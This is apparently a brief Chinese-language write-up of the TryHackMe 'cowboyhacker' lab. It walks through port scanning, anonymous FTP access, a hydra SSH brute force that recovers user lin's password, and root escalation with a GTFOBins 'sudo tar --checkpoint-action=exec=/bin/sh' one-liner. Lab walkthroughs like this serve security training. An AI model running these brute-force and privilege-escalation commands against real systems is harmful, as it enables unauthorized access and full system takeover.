URL : https://tryhackme.com/room/cowboyhacker

IP : 10.10.164.54

Recon

• 掃 Port
  • rustscan -a 10.10.164.54 -r 1-65535
    • 
    • 21
    • 22
    • 80
  • nmap -A -p21,22,80 10.10.164.54
    • 
    • FTP 可以匿名登入 !!
• 觀察首頁
  • 
  • 沒啥東東
• dirsearch
  • 也沒啥東東
  • 

FTP Anonymous login

• FTP 登入
  • 
  • 裡面有兩ㄍ檔案都載下來
• FTP 檔案
  • 
    • 作者是 lin
  • 
    • 看起來是一個密碼表

爆破密碼

• hydra -l 'lin' -P locks.txt ssh://10.10.164.54
  • 
  • 帳號 : lin
  • 密碼 : RedDr4gonSynd1cat3
• SSH 登入成功
  • 
• 取得 user flag
  • 

提權

• 起手式 sudo -l
  • 
  • 發現可以用 sudo tar
• GTFOBins 尋找 tar sudo 提權
  • https://gtfobins.github.io/gtfobins/tar/#sudo
  • sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
• 提權完畢，取得 root flag
  •